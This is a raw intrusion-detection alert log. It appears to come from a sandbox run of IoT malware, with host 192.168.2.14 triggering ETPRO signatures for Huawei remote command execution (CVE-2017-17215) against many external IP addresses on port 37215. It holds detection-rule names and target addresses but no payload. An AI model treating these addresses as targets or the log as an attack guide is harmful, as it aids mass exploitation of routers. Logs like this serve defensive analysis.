                                                    07/10/24-08:26:38.549884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887637215192.168.2.14137.184.102.103
                                                    07/10/24-08:26:38.596849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964237215192.168.2.14178.7.60.243
                                                    07/10/24-08:27:31.448470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300837215192.168.2.14137.248.234.184
                                                    07/10/24-08:26:49.791471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469037215192.168.2.1441.153.162.207
                                                    07/10/24-08:27:27.151172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821837215192.168.2.14157.147.50.215
                                                    07/10/24-08:27:30.553944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641037215192.168.2.14197.56.8.225
                                                    07/10/24-08:26:20.179402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489437215192.168.2.14157.76.10.110
                                                    07/10/24-08:27:22.835988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638837215192.168.2.14157.155.230.165
                                                    07/10/24-08:27:33.817300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326837215192.168.2.14157.41.163.195
                                                    07/10/24-08:26:34.216677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800637215192.168.2.14124.33.4.121
                                                    07/10/24-08:26:45.615423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359437215192.168.2.1448.211.219.23
                                                    07/10/24-08:26:49.846207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953837215192.168.2.14157.48.39.239
                                                    07/10/24-08:26:41.364208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402837215192.168.2.14206.145.97.172
                                                    07/10/24-08:26:13.759020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3522037215192.168.2.14157.59.253.208
                                                    07/10/24-08:26:20.188869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198037215192.168.2.14157.153.89.82
                                                    07/10/24-08:26:41.516990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803637215192.168.2.14157.224.91.93
                                                    07/10/24-08:26:13.747131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141237215192.168.2.14197.241.238.101
                                                    07/10/24-08:26:38.520024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5406037215192.168.2.14196.243.141.52
                                                    07/10/24-08:26:52.060125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520237215192.168.2.1441.157.183.222
                                                    07/10/24-08:27:23.886459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341837215192.168.2.1462.229.81.130
                                                    07/10/24-08:26:31.099598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800037215192.168.2.14188.79.36.56
                                                    07/10/24-08:26:47.864255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966237215192.168.2.1441.157.139.163
                                                    07/10/24-08:27:19.343381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831237215192.168.2.14213.60.170.55
                                                    07/10/24-08:26:41.606655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931037215192.168.2.14157.22.79.252
                                                    07/10/24-08:26:41.621146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930437215192.168.2.1441.247.127.118
                                                    07/10/24-08:27:33.872945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109037215192.168.2.14202.181.247.46
                                                    07/10/24-08:26:55.423552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706437215192.168.2.1487.111.215.174
                                                    07/10/24-08:26:55.337044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679437215192.168.2.14157.250.3.37
                                                    07/10/24-08:26:43.594845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094237215192.168.2.14197.10.243.223
                                                    07/10/24-08:27:22.853390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621437215192.168.2.14197.55.185.99
                                                    07/10/24-08:26:23.279248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830637215192.168.2.1441.249.97.205
                                                    07/10/24-08:27:19.239494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704237215192.168.2.1441.46.226.34
                                                    07/10/24-08:26:51.950900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035837215192.168.2.14157.185.252.236
                                                    07/10/24-08:26:11.157015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674637215192.168.2.14157.15.8.197
                                                    07/10/24-08:26:52.055054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656237215192.168.2.1441.9.20.243
                                                    07/10/24-08:26:22.216208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402837215192.168.2.1441.24.120.47
                                                    07/10/24-08:26:13.819376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734437215192.168.2.1441.122.83.60
                                                    07/10/24-08:27:32.590105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897837215192.168.2.1441.80.6.233
                                                    07/10/24-08:26:28.922659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061637215192.168.2.14197.221.113.11
                                                    07/10/24-08:26:33.204295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000237215192.168.2.14197.125.28.49
                                                    07/10/24-08:26:42.406060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221237215192.168.2.14157.85.47.192
                                                    07/10/24-08:26:41.525787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865037215192.168.2.14157.244.200.224
                                                    07/10/24-08:27:32.623300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458237215192.168.2.14157.59.32.84
                                                    07/10/24-08:26:14.806375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467637215192.168.2.1441.129.178.170
                                                    07/10/24-08:26:47.953100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488437215192.168.2.14157.5.212.175
                                                    07/10/24-08:27:08.451425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811837215192.168.2.1441.121.40.209
                                                    07/10/24-08:26:52.073634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096837215192.168.2.14157.20.66.228
                                                    07/10/24-08:27:22.931726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811637215192.168.2.1441.176.111.245
                                                    07/10/24-08:27:05.165980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209837215192.168.2.1441.22.182.8
                                                    07/10/24-08:26:20.134234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497437215192.168.2.14157.182.49.70
                                                    07/10/24-08:27:22.765325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899837215192.168.2.14197.249.22.206
                                                    07/10/24-08:26:11.544307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419037215192.168.2.14157.250.95.47
                                                    07/10/24-08:26:41.611798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737637215192.168.2.14197.219.64.13
                                                    07/10/24-08:26:25.496138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998237215192.168.2.14157.63.118.98
                                                    07/10/24-08:26:28.681794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940237215192.168.2.14157.95.227.220
                                                    07/10/24-08:26:53.209025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695637215192.168.2.14157.149.59.178
                                                    07/10/24-08:26:59.851109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656837215192.168.2.14197.191.221.127
                                                    07/10/24-08:26:42.451882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4534837215192.168.2.1441.173.234.253
                                                    07/10/24-08:26:47.909293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771237215192.168.2.14138.69.14.179
                                                    07/10/24-08:26:22.217078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718237215192.168.2.1453.95.194.88
                                                    07/10/24-08:26:18.004121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830837215192.168.2.14157.182.247.140
                                                    07/10/24-08:27:05.138827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497237215192.168.2.14197.79.235.8
                                                    07/10/24-08:27:03.013540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113237215192.168.2.1472.138.147.243
                                                    07/10/24-08:26:42.343716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4907437215192.168.2.1441.138.242.127
                                                    07/10/24-08:26:23.354111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000237215192.168.2.14197.189.8.241
                                                    07/10/24-08:27:17.056962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702437215192.168.2.14197.128.167.146
                                                    07/10/24-08:26:41.349048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853437215192.168.2.14111.81.90.27
                                                    07/10/24-08:27:22.532375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330437215192.168.2.14157.208.242.229
                                                    07/10/24-08:27:07.286567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811437215192.168.2.1441.50.9.168
                                                    07/10/24-08:27:08.399018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838637215192.168.2.1441.7.75.145
                                                    07/10/24-08:27:23.893533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199437215192.168.2.1439.96.102.143
                                                    07/10/24-08:27:00.596679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927037215192.168.2.14157.49.113.106
                                                    07/10/24-08:27:20.453874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366237215192.168.2.14157.216.55.44
                                                    07/10/24-08:27:08.350024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286037215192.168.2.14163.24.112.56
                                                    07/10/24-08:27:13.848645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526237215192.168.2.14197.214.244.240
                                                    07/10/24-08:26:42.399244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538437215192.168.2.1441.214.170.146
                                                    07/10/24-08:26:43.778189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749237215192.168.2.14197.28.202.206
                                                    07/10/24-08:26:43.846786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434237215192.168.2.1494.227.0.42
                                                    07/10/24-08:26:52.010263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771437215192.168.2.14169.179.150.226
                                                    07/10/24-08:26:57.637421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824637215192.168.2.1441.232.116.143
                                                    07/10/24-08:27:14.821259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359237215192.168.2.1469.212.89.96
                                                    07/10/24-08:26:22.232329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592237215192.168.2.1441.0.234.160
                                                    07/10/24-08:26:23.330913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889637215192.168.2.14197.2.141.169
                                                    07/10/24-08:27:19.196135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100837215192.168.2.14157.92.231.161
                                                    07/10/24-08:26:15.871447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276037215192.168.2.14157.64.58.147
                                                    07/10/24-08:26:49.778031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281237215192.168.2.14157.132.213.70
                                                    07/10/24-08:26:38.548975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744237215192.168.2.1441.109.134.1
                                                    07/10/24-08:27:02.960624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474637215192.168.2.14216.162.95.159
                                                    07/10/24-08:27:27.126835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607237215192.168.2.1441.20.189.153
                                                    07/10/24-08:26:25.477490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627637215192.168.2.14197.44.72.194
                                                    07/10/24-08:26:34.238192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567237215192.168.2.14146.53.113.100
                                                    07/10/24-08:26:28.911509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742837215192.168.2.1441.78.22.204
                                                    07/10/24-08:26:13.832527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901837215192.168.2.1441.168.163.191
                                                    07/10/24-08:27:02.843414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467237215192.168.2.1467.211.100.44
                                                    07/10/24-08:27:14.889916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697237215192.168.2.14197.162.178.220
                                                    07/10/24-08:27:27.165104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495837215192.168.2.1458.22.60.113
                                                    07/10/24-08:26:34.216677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328037215192.168.2.14197.252.106.248
                                                    07/10/24-08:26:33.246495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228237215192.168.2.14208.28.4.229
                                                    07/10/24-08:27:32.600329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812037215192.168.2.14157.205.93.86
                                                    07/10/24-08:26:30.989109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782437215192.168.2.1436.178.85.39
                                                    07/10/24-08:27:19.259031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810037215192.168.2.14157.77.145.138
                                                    07/10/24-08:27:27.126836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931437215192.168.2.14157.72.7.242
                                                    07/10/24-08:26:38.631405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972437215192.168.2.1441.232.79.35
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808037215192.168.2.14157.214.136.230
                                                    07/10/24-08:26:25.457163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735837215192.168.2.14197.188.208.14
                                                    07/10/24-08:27:05.064753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800637215192.168.2.1441.161.213.131
                                                    07/10/24-08:26:47.933430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719437215192.168.2.14157.59.4.155
                                                    07/10/24-08:27:02.709272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474437215192.168.2.14148.103.69.58
                                                    07/10/24-08:26:43.856706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782237215192.168.2.1441.19.61.9
                                                    07/10/24-08:26:52.001475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625437215192.168.2.1441.128.100.127
                                                    07/10/24-08:27:19.317651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847437215192.168.2.14157.108.178.252
                                                    07/10/24-08:26:55.268885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845837215192.168.2.14157.159.31.49
                                                    07/10/24-08:26:55.425503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155637215192.168.2.14197.212.166.7
                                                    07/10/24-08:26:59.761557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309637215192.168.2.14157.38.82.78
                                                    07/10/24-08:27:20.521213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600837215192.168.2.14197.51.148.67
                                                    07/10/24-08:26:22.211996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289237215192.168.2.14157.90.205.228
                                                    07/10/24-08:26:43.672613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291437215192.168.2.1476.158.43.1
                                                    07/10/24-08:26:43.574763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659637215192.168.2.14157.33.66.63
                                                    07/10/24-08:27:08.339308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368437215192.168.2.14157.129.91.117
                                                    07/10/24-08:26:15.860013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857037215192.168.2.1454.236.161.67
                                                    07/10/24-08:26:17.981355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720037215192.168.2.14168.174.248.59
                                                    07/10/24-08:26:49.828645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016837215192.168.2.14197.8.44.236
                                                    07/10/24-08:27:30.461337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233437215192.168.2.14157.98.142.175
                                                    07/10/24-08:26:11.550760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148237215192.168.2.14157.52.65.140
                                                    07/10/24-08:26:55.408073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332237215192.168.2.142.98.62.171
                                                    07/10/24-08:27:31.548799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459837215192.168.2.14197.195.37.217
                                                    07/10/24-08:26:29.863602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428837215192.168.2.14200.153.168.242
                                                    07/10/24-08:26:33.252785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858237215192.168.2.14197.155.39.214
                                                    07/10/24-08:27:05.179313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425637215192.168.2.14157.151.211.83
                                                    07/10/24-08:27:32.565962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342237215192.168.2.14157.36.169.0
                                                    07/10/24-08:27:32.596186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160837215192.168.2.14157.30.69.244
                                                    07/10/24-08:26:17.984415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463237215192.168.2.14144.8.138.73
                                                    07/10/24-08:26:25.493700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782437215192.168.2.1465.174.35.87
                                                    07/10/24-08:26:41.469973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311437215192.168.2.1441.179.158.110
                                                    07/10/24-08:27:07.382774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891037215192.168.2.14157.152.173.53
                                                    07/10/24-08:26:13.830760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239037215192.168.2.14157.84.199.199
                                                    07/10/24-08:26:20.171305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766437215192.168.2.1441.32.79.87
                                                    07/10/24-08:26:42.154105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948637215192.168.2.14157.78.34.133
                                                    07/10/24-08:27:13.752380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373437215192.168.2.1472.244.36.13
                                                    07/10/24-08:27:30.523582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029637215192.168.2.14197.178.144.148
                                                    07/10/24-08:27:33.953196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995837215192.168.2.14221.170.224.108
                                                    07/10/24-08:26:28.879483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912837215192.168.2.14157.171.66.154
                                                    07/10/24-08:27:17.053274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300237215192.168.2.1441.183.159.44
                                                    07/10/24-08:27:10.616142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883637215192.168.2.14118.216.106.255
                                                    07/10/24-08:26:55.472197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557037215192.168.2.1441.211.58.74
                                                    07/10/24-08:26:13.758609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536037215192.168.2.14197.236.77.231
                                                    07/10/24-08:27:02.720198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363237215192.168.2.14157.145.106.51
                                                    07/10/24-08:26:13.746108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308037215192.168.2.14183.199.201.1
                                                    07/10/24-08:26:14.814153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368237215192.168.2.14197.60.223.111
                                                    07/10/24-08:26:17.941033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353037215192.168.2.14157.106.58.60
                                                    07/10/24-08:26:25.411489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898437215192.168.2.1463.137.250.76
                                                    07/10/24-08:26:26.602749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384437215192.168.2.14197.217.92.1
                                                    07/10/24-08:27:07.376255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736037215192.168.2.1476.249.137.178
                                                    07/10/24-08:26:43.742007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927037215192.168.2.14157.162.24.226
                                                    07/10/24-08:26:20.173091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025837215192.168.2.14197.147.171.60
                                                    07/10/24-08:26:31.106544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273837215192.168.2.14197.120.17.47
                                                    07/10/24-08:26:38.642305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322237215192.168.2.1441.75.4.144
                                                    07/10/24-08:26:55.367702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316437215192.168.2.14197.26.164.38
                                                    07/10/24-08:26:57.654804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520437215192.168.2.14197.35.242.154
                                                    07/10/24-08:26:22.242541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154437215192.168.2.14197.255.177.53
                                                    07/10/24-08:27:28.147073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513237215192.168.2.14148.196.72.237
                                                    07/10/24-08:27:34.131250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192237215192.168.2.14197.82.157.87
                                                    07/10/24-08:27:10.636807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866437215192.168.2.1441.190.20.31
                                                    07/10/24-08:26:55.366242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301037215192.168.2.14197.225.151.166
                                                    07/10/24-08:27:13.883057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450637215192.168.2.14197.18.76.176
                                                    07/10/24-08:26:55.449292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493437215192.168.2.14208.232.219.239
                                                    07/10/24-08:27:30.439171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.1441.47.198.21
                                                    07/10/24-08:27:22.532217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765037215192.168.2.14157.32.167.86
                                                    07/10/24-08:26:22.291086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506637215192.168.2.1441.215.115.115
                                                    07/10/24-08:26:41.621146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489437215192.168.2.14179.35.114.143
                                                    07/10/24-08:27:23.942697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323637215192.168.2.14105.151.147.232
                                                    07/10/24-08:26:18.000984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678437215192.168.2.14194.101.223.254
                                                    07/10/24-08:26:28.768053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939037215192.168.2.14157.159.101.151
                                                    07/10/24-08:26:48.032433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773037215192.168.2.14197.95.199.13
                                                    07/10/24-08:26:43.700993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565837215192.168.2.14157.7.154.209
                                                    07/10/24-08:27:23.792966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883837215192.168.2.14157.30.77.44
                                                    07/10/24-08:26:57.542157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222437215192.168.2.1441.34.244.13
                                                    07/10/24-08:26:28.910325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621637215192.168.2.1420.0.113.170
                                                    07/10/24-08:26:45.620674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090637215192.168.2.1441.210.133.254
                                                    07/10/24-08:26:38.544171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895237215192.168.2.1441.237.200.249
                                                    07/10/24-08:26:55.417071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722237215192.168.2.14139.37.4.170
                                                    07/10/24-08:27:20.445959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916037215192.168.2.14197.51.35.223
                                                    07/10/24-08:26:22.280856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358637215192.168.2.1441.29.21.42
                                                    07/10/24-08:26:36.340754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117437215192.168.2.14197.199.114.37
                                                    07/10/24-08:27:30.461336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759637215192.168.2.1441.60.79.119
                                                    07/10/24-08:26:11.148653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278437215192.168.2.14197.83.244.91
